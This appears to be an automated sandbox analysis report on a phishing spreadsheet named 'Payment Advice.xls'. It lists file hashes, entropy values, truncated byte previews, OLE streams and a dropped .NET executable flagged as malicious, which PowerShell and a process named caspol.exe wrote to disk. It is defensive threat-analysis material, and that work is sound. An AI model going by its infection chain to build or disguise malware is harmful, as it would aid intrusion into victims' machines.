                                                                    Entropy (8bit):7.939241252996024
                                                                    Encrypted:false
                                                                    SSDEEP:12288:SI9Ien9OVRqfPSMCfhhBKNle3/XPL9dnq/M/+5wyLPH9Jwjm:jLnCRwSNjBKNA/XTDqHLPkj
                                                                    MD5:74F3FB367063DF4F13B131A8E1B608AC
                                                                    SHA1:99F202D01073BFB75EBB0DD4595A84093D99CE55
                                                                    SHA-256:D3377C7947A065C85F0FF8CC0BE16759776FB9AF6BED981B5691602A48CED628
                                                                    SHA-512:EEDDA2504A6C6692228668A13586743464247C35348E92EA18297F496FDEC80EAD0174031BB8721A5F9628CDAE9ABECA9F94A0A3FB5CDEB9EB6C2CF15337A3F4
                                                                    Malicious:false
                                                                    Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):10240
                                                                    Entropy (8bit):0.6739662216458647
                                                                    Encrypted:false
                                                                    SSDEEP:12:Ppb0slZp69PO9tauZ7nH2AaYSQ81v0t4TreIBUxFj87+k/R:RbG4WuZfKZ1c+reIAon/R
                                                                    MD5:C61F99FE7BEE945FC31B62121BE075CD
                                                                    SHA1:083BBD0568633FECB8984002EB4FE8FA08E17DD9
                                                                    SHA-256:1E0973F4EDEF345D1EA8E90E447B9801FABDE63A2A1751E63B91A8467E130732
                                                                    SHA-512:46D743C564A290EDFF307F8D0EF012BB01ED4AA6D9667E87A53976B8F3E87D78BEBE763121A91BA8FB5B0CF5A8C9FDE313D7FBD144FB929D98D7D39F4C9602C9
                                                                    Malicious:false
                                                                    Preview: ....+..F..N..F).~]............\.">.. .......p.J..} /o...rLj-...FS..'x.o..%^ .....zr/..3.y.e4...MM.4..x9.f.D..{..(....'p......9...Qn..d..+.....H..M.)..........].....n-.]........n&.*.H`.sz...r.....1B.....e.."...A.....,-....n..$.<....CO..VO..P..'.......<......n....&5s....z..$.{'IM-.o..(#N.-..(H...a&...y.S..`8.(./...1.P.. .....K.3.......I!]G....@N........F.l.T=.0...`"..L....B...B`nI.<.....&F..2J2....1..Rs....h.Zq.`...t..CJ....@.....I.G.e..k..H.....F..G:..6.G.l=.Y......:...C.........?[.ts...=....;.|...q...@....s................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):24152
                                                                    Entropy (8bit):0.7513521539333206
                                                                    Encrypted:false
                                                                    SSDEEP:24:CMLhbFnirW0rAHV4Ji9Tp5fGtFTIvs5/KUC6m6C9xRjNi1uiHIzVp9:CMBFF0kKJoTetFTFZKR6axR6uiozVb
                                                                    MD5:8A8D71BED4B5760F2F82C680C2C8CACC
                                                                    SHA1:FA589EA7BA858C514079289BCEA3625432110427
                                                                    SHA-256:78CF9C5CCAC6BEF4326F7514D4083BBC223347412A3D2975EDA8AD679D4EEB2B
                                                                    SHA-512:8D06BAC9D7433AAAD1126CF922F133FF2946A830507BFA0308677D3D81E5559A708D7733BB87C9CA70A8146DD6C2DB5B50A4D97F9442FE615483711B12445BC9
                                                                    Malicious:false
                                                                    Preview: ...W....K.h.E..g..0...!1sm.[t\......A......Ov..M..E........b...|,.g..t..;x..l..w......:......:..._.u.X....K../...eg..d......di...#....Y....3..m...M..S..U...-.`..2Z..............?.......o P.=...@p...H..J....-..*:..0.z\.i.U..(.3...Z7..8k.......x.Ja&%.t.,..%\...HALm[."..H.....`..kO'..>.6....C.X...Hv..p.~B..-i....C..J>t<...g.n7'....$.........1..1S..4.r.).m...pO........-..9..Y....H.o_u...j....D.+&.9wu5H..r.z...A...%........3.... ......E-....a.p.-!...z...j..J....tSE.B........b..o;.nG.2^...Y,.....5...;......?.K9.{..z\D.G..%..0.,..(..oS...5.......gem...|a...p.uE.G8+....[q......G.;K....,..1&.....b...../%'.Q.;Kl...._"...:]Q.L...Q1?....5..@t .E%......w}..(...J.]..........................................................................................................................................................................................................................................................................................................
                                                                    Process:C:\Users\user\AppData\Roaming\caspol.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):600576
                                                                    Entropy (8bit):7.915042903583073
                                                                    Encrypted:false
                                                                    SSDEEP:12288:frO3+Ri3AgFdygxDJz5WFux50+KnCKmfRLdW3Kt9c+O7:LQ3AgyKJdG+wmNdsKM+O7
                                                                    MD5:74061922F1E78C237A66D12A15A18181
                                                                    SHA1:E31EE444AAA552A100F006E43F0810497A3B0387
                                                                    SHA-256:89BF888148EAE2CAABDC6D3FFF98054127B197B402493581894A3104ED6B6F1C
                                                                    SHA-512:306744107D78B02ECFD28252DAE954F0B47C1F761E15A33C937474A2E15284C17BB7E2542618B745EA5F95E5A7DBA3D27B675C8837914A44D8B5B350A3D4A136
                                                                    Malicious:true
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5=g..............0...... .......'... ...@....@.. ....................................`..................................&..O....@..|....................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc...|....@......................@..@.reloc.......`.......(..............@..B.................'......H........6...(...........^..(.............................................(......}.....{....r...p .....o5....{....o7...&*....0...........{......o9.....}........&.....*..................0..t........o.....{.....{....r...p(....o:.......+%.....{.....o....o;.....o......&....X....i2..{.....o<.......&.{....o=........*......+..E..........\b......2.{....oA...*n.(......}......}.....(....*....0...........{....o......3...%..;.o......{....o.....s......{.......o....,ir5..p..o......+...(...
                                                                    Process:C:\Users\user\AppData\Roaming\caspol.exe
                                                                    File Type:very short file (no magic)
                                                                    Category:dropped
                                                                    Size (bytes):1
                                                                    Entropy (8bit):0.0
                                                                    Encrypted:false
                                                                    SSDEEP:3:U:U
                                                                    MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                    Malicious:false
                                                                    Preview:1
                                                                    Process:C:\Users\user\AppData\Roaming\caspol.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):46
                                                                    Entropy (8bit):1.0424600748477153
                                                                    Encrypted:false
                                                                    SSDEEP:3:/lbWwWl:sZ
                                                                    MD5:3B7B4F5326139F48EFA0AAE509E2FE58
                                                                    SHA1:209A1CE7AF7FF28CCD52AE9C8A89DEE5F2C1D57A
                                                                    SHA-256:D47B073BF489AB75A26EBF82ABA0DAB7A484F83F8200AB85EBD57BED472022FC
                                                                    SHA-512:C99D99EA71E54629815099464A233E7617E4E118DD5B2A7A32CF41141CB9815DF47B0A40D1A9F89980C307596B53DD63F76DD52CF10EE21F47C635C5F68786B5
                                                                    Malicious:false
                                                                    Preview:........................................user.
                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):600576
                                                                    Entropy (8bit):7.915042903583073
                                                                    Encrypted:false
                                                                    SSDEEP:12288:frO3+Ri3AgFdygxDJz5WFux50+KnCKmfRLdW3Kt9c+O7:LQ3AgyKJdG+wmNdsKM+O7
                                                                    MD5:74061922F1E78C237A66D12A15A18181
                                                                    SHA1:E31EE444AAA552A100F006E43F0810497A3B0387
                                                                    SHA-256:89BF888148EAE2CAABDC6D3FFF98054127B197B402493581894A3104ED6B6F1C
                                                                    SHA-512:306744107D78B02ECFD28252DAE954F0B47C1F761E15A33C937474A2E15284C17BB7E2542618B745EA5F95E5A7DBA3D27B675C8837914A44D8B5B350A3D4A136
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5=g..............0...... .......'... ...@....@.. ....................................`..................................&..O....@..|....................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc...|....@......................@..@.reloc.......`.......(..............@..B.................'......H........6...(...........^..(.............................................(......}.....{....r...p .....o5....{....o7...&*....0...........{......o9.....}........&.....*..................0..t........o.....{.....{....r...p(....o:.......+%.....{.....o....o;.....o......&....X....i2..{.....o<.......&.{....o=........*......+..E..........\b......2.{....oA...*n.(......}......}.....(....*....0...........{....o......3...%..;.o......{....o.....s......{.......o....,ir5..p..o......+...(...
                                                                    Process:C:\Users\user\AppData\Roaming\caspol.exe
                                                                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                    Category:dropped
                                                                    Size (bytes):600576
                                                                    Entropy (8bit):7.915042903583073
                                                                    Encrypted:false
                                                                    SSDEEP:12288:frO3+Ri3AgFdygxDJz5WFux50+KnCKmfRLdW3Kt9c+O7:LQ3AgyKJdG+wmNdsKM+O7
                                                                    MD5:74061922F1E78C237A66D12A15A18181
                                                                    SHA1:E31EE444AAA552A100F006E43F0810497A3B0387
                                                                    SHA-256:89BF888148EAE2CAABDC6D3FFF98054127B197B402493581894A3104ED6B6F1C
                                                                    SHA-512:306744107D78B02ECFD28252DAE954F0B47C1F761E15A33C937474A2E15284C17BB7E2542618B745EA5F95E5A7DBA3D27B675C8837914A44D8B5B350A3D4A136
                                                                    Malicious:true
                                                                    Antivirus:
                                                                    • Antivirus: Avira, Detection: 100%
                                                                    • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....5=g..............0...... .......'... ...@....@.. ....................................`..................................&..O....@..|....................`....................................................... ............... ..H............text...4.... ...................... ..`.rsrc...|....@......................@..@.reloc.......`.......(..............@..B.................'......H........6...(...........^..(.............................................(......}.....{....r...p .....o5....{....o7...&*....0...........{......o9.....}........&.....*..................0..t........o.....{.....{....r...p(....o:.......+%.....{.....o....o;.....o......&....X....i2..{.....o<.......&.{....o=........*......+..E..........\b......2.{....oA...*n.(......}......}.....(....*....0...........{....o......3...%..;.o......{....o.....s......{.......o....,ir5..p..o......+...(...
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Nov 20 06:57:01 2024, Security: 1
                                                                    Category:dropped
                                                                    Size (bytes):935936
                                                                    Entropy (8bit):7.986092737447108
                                                                    Encrypted:false
                                                                    SSDEEP:12288:vCtI9Ien9OVRqfPSMCfhhBKNle3/XPL9dnq/M/+5wyLPH9JwjmeOsjF+8+SaxMDa:TLnCRwSNjBKNA/XTDqHLPkjeoOTxKVc
                                                                    MD5:FE52E1B2FAD0A9DBC313BFCEF716BB24
                                                                    SHA1:588DDDB8316556F896831E956356EE9C42839318
                                                                    SHA-256:81879191E77853BB80A206C89FD2E4342FCD80C10FDEE0B0FCE3D4AA7DE20791
                                                                    SHA-512:A3412C3E99F5D97DBF2DA9CF25F2FB73B1B682763452C105919ED91C1E807E179B3B627F0B58145EE43FCDB48F6F3485493E36059BA4F50BADCB62A7E48265DE
                                                                    Malicious:false
                                                                    Preview:......................>...................................$...........................................................f.......h.......................................................................................................................................................................................................................................................................................................................................................................................................!................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:ASCII text, with CRLF line terminators
                                                                    Category:dropped
                                                                    Size (bytes):26
                                                                    Entropy (8bit):3.95006375643621
                                                                    Encrypted:false
                                                                    SSDEEP:3:ggPYV:rPYV
                                                                    MD5:187F488E27DB4AF347237FE461A079AD
                                                                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                    Malicious:false
                                                                    Preview:[ZoneTransfer]....ZoneId=0
                                                                    Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    File Type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Nov 20 06:57:01 2024, Security: 1
                                                                    Category:dropped
                                                                    Size (bytes):935936
                                                                    Entropy (8bit):7.986092737447108
                                                                    Encrypted:false
                                                                    SSDEEP:12288:vCtI9Ien9OVRqfPSMCfhhBKNle3/XPL9dnq/M/+5wyLPH9JwjmeOsjF+8+SaxMDa:TLnCRwSNjBKNA/XTDqHLPkjeoOTxKVc
                                                                    MD5:FE52E1B2FAD0A9DBC313BFCEF716BB24
                                                                    SHA1:588DDDB8316556F896831E956356EE9C42839318
                                                                    SHA-256:81879191E77853BB80A206C89FD2E4342FCD80C10FDEE0B0FCE3D4AA7DE20791
                                                                    SHA-512:A3412C3E99F5D97DBF2DA9CF25F2FB73B1B682763452C105919ED91C1E807E179B3B627F0B58145EE43FCDB48F6F3485493E36059BA4F50BADCB62A7E48265DE
                                                                    Malicious:true
                                                                    Preview:......................>...................................$...........................................................f.......h.......................................................................................................................................................................................................................................................................................................................................................................................................!................................................................................................................... ...!..."...#...$...%...&...'...(...)...*...+...,...-......./...0...1...2...3...4...5...6...7...8...9...:...;...<...=...>...?...@...A...B...C...D...E...F...G...H...I...J...K...L...M...N...O...P...Q...R...S...T...U...V...W...X...Y...Z...[...\...]...^..._...`...a...b...c...d...e...f...g...h...i...j...k...l...m...n...o...p...q...r...s...t...u...v...w...x...y...z...
                                                                    File type:Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Wed Nov 20 01:29:52 2024, Security: 1
                                                                    Entropy (8bit):7.9810419545717215
                                                                    TrID:
                                                                    • Microsoft Excel sheet (30009/1) 47.99%
                                                                    • Microsoft Excel sheet (alternate) (24509/1) 39.20%
                                                                    • Generic OLE2 / Multistream Compound File (8008/1) 12.81%
                                                                    File name:Payment Advice.xls
                                                                    File size:1'136'128 bytes
                                                                    MD5:5a69ac58c3133e24a783cf4ea670a243
                                                                    SHA1:7fdf7feed6f105ce6bfeb34fb44c9c58dfe9057e
                                                                    SHA256:f942a3046520f7838e33a1116faf8b9a6615756f044551651207f53b755a024d
                                                                    SHA512:5b338a97aacf226f9e4360eec8fa2149cb5a77836f357e76c276a799625f91ceb4c9b49c0ef13a9fc31a98770eb0088192ba0b05b2ec668beaa5cd71ccc30c04
                                                                    SSDEEP:24576:auq9PLiijE2Z5Z2amwshXCdQtF84LJQohL7m90Ns4Ql1xzRjpCrHac:auEPLiij7Z5ZKwsAsFjLJQohm90Clvzu
                                                                    TLSH:89352355F985EF06D69BA9320CA3D8F22408BC83BF69A2422730779F647D1F81F47195
                                                                    File Content Preview:........................>.......................................................................................................i.......k.......m..............................................................................................................
                                                                    Icon Hash:276ea3a6a6b7bfbf
                                                                    Document Type:OLE
                                                                    Number of OLE Files:1
                                                                    Has Summary Info:
                                                                    Application Name:Microsoft Excel
                                                                    Encrypted Document:True
                                                                    Contains Word Document Stream:False
                                                                    Contains Workbook/Book Stream:True
                                                                    Contains PowerPoint Document Stream:False
                                                                    Contains Visio Document Stream:False
                                                                    Contains ObjectPool Stream:False
                                                                    Flash Objects Count:0
                                                                    Contains VBA Macros:True
                                                                    Code Page:1252
                                                                    Author:
                                                                    Last Saved By:
                                                                    Create Time:2006-09-16 00:00:00
                                                                    Last Saved Time:2024-11-20 01:29:52
                                                                    Creating Application:Microsoft Excel
                                                                    Security:1
                                                                    Document Code Page:1252
                                                                    Thumbnail Scaling Desired:False
                                                                    Contains Dirty Links:False
                                                                    Shared Document:False
                                                                    Changed Hyperlinks:False
                                                                    Application Version:786432
                                                                    General
                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet1
                                                                    VBA File Name:Sheet1.cls
                                                                    Stream Size:977
                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w I m . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 77 49 6d 84 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                    Attribute VB_Name = "Sheet1"
                                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                    Attribute VB_GlobalNameSpace = False
                                                                    Attribute VB_Creatable = False
                                                                    Attribute VB_PredeclaredId = True
                                                                    Attribute VB_Exposed = True
                                                                    Attribute VB_TemplateDerived = False
                                                                    Attribute VB_Customizable = True
                                                                    

                                                                    General
                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet2
                                                                    VBA File Name:Sheet2.cls
                                                                    Stream Size:977
                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w I 7 . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
                                                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 77 49 37 ef 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                    Attribute VB_Name = "Sheet2"
                                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                    Attribute VB_GlobalNameSpace = False
                                                                    Attribute VB_Creatable = False
                                                                    Attribute VB_PredeclaredId = True
                                                                    Attribute VB_Exposed = True
                                                                    Attribute VB_TemplateDerived = False
                                                                    Attribute VB_Customizable = True
                                                                    

                                                                    General
                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/Sheet3
                                                                    VBA File Name:Sheet3.cls
                                                                    Stream Size:977
                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w I . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
                                                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 77 49 e2 95 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                    Attribute VB_Name = "Sheet3"
                                                                    Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
                                                                    Attribute VB_GlobalNameSpace = False
                                                                    Attribute VB_Creatable = False
                                                                    Attribute VB_PredeclaredId = True
                                                                    Attribute VB_Exposed = True
                                                                    Attribute VB_TemplateDerived = False
                                                                    Attribute VB_Customizable = True
                                                                    

                                                                    General
                                                                    Stream Path:_VBA_PROJECT_CUR/VBA/ThisWorkbook
                                                                    VBA File Name:ThisWorkbook.cls
                                                                    Stream Size:985
                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . w I K K . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 .
                                                                    Data Raw:01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 77 49 4b 4b 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                    Attribute VB_Name = "ThisWorkbook"
                                                                    Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
                                                                    Attribute VB_GlobalNameSpace = False
                                                                    Attribute VB_Creatable = False
                                                                    Attribute VB_PredeclaredId = True
                                                                    Attribute VB_Exposed = True
                                                                    Attribute VB_TemplateDerived = False
                                                                    Attribute VB_Customizable = True
                                                                    

                                                                    General
                                                                    Stream Path:\x1CompObj
                                                                    CLSID:
                                                                    File Type:data
                                                                    Stream Size:114
                                                                    Entropy:4.25248375192737
                                                                    Base64 Encoded:True
                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
                                                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                    General
                                                                    Stream Path:\x5DocumentSummaryInformation
                                                                    CLSID:
                                                                    File Type:data
                                                                    Stream Size:244
                                                                    Entropy:2.889430592781307
                                                                    Base64 Encoded:False
                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
                                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00
                                                                    General
                                                                    Stream Path:\x5SummaryInformation
                                                                    CLSID:
                                                                    File Type:data
                                                                    Stream Size:200
                                                                    Entropy:3.2603503175049817
                                                                    Base64 Encoded:False
                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . | . # . @ . . . . B : . . . . . . . . .
                                                                    Data Raw:fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00
                                                                    General
                                                                    Stream Path:MBD001C4526/\x1CompObj
                                                                    CLSID:
                                                                    File Type:data
                                                                    Stream Size:99
                                                                    Entropy:3.631242196770981
                                                                    Base64 Encoded:False
                                                                    Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
                                                                    Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
                                                                    General
                                                                    Stream Path:MBD001C4526/Package
                                                                    CLSID:
                                                                    File Type:Microsoft Excel 2007+
                                                                    Stream Size:781880
                                                                    Entropy:7.996310602391636
                                                                    Base64 Encoded:True
                                                                    Data ASCII:P K . . . . . . . . . . ! . j A 3 . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                                                                    Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 6a 41 33 c9 e9 01 00 00 fc 08 00 00 13 00 e1 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dd 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                    General
                                                                    Stream Path:MBD001C4527/\x1Ole
                                                                    CLSID:
                                                                    File Type:data
                                                                    Stream Size:376
                                                                    Entropy:4.942740636887529
                                                                    Base64 Encoded:False
